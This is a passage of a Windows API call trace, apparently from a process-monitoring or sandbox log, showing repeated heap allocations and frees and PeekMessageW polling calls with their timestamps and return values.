(HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0136.723] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0136.723] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0136.724] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0136.724] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0136.724] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0136.724] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0136.724] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0136.725] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0136.725] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0136.726] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0136.814] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0136.815] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0136.815] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0136.815] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0136.816] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0136.816] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0136.817] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0136.817] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0136.817] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0136.817] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0136.818] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0136.818] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0136.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0136.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0136.819] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0136.819] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0136.819] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0136.820] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0136.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0136.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0136.820] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0136.821] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0136.821] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.821] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0136.821] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0136.822] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0136.822] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.822] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0136.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.823] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0136.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.823] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.823] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.824] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.825] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, 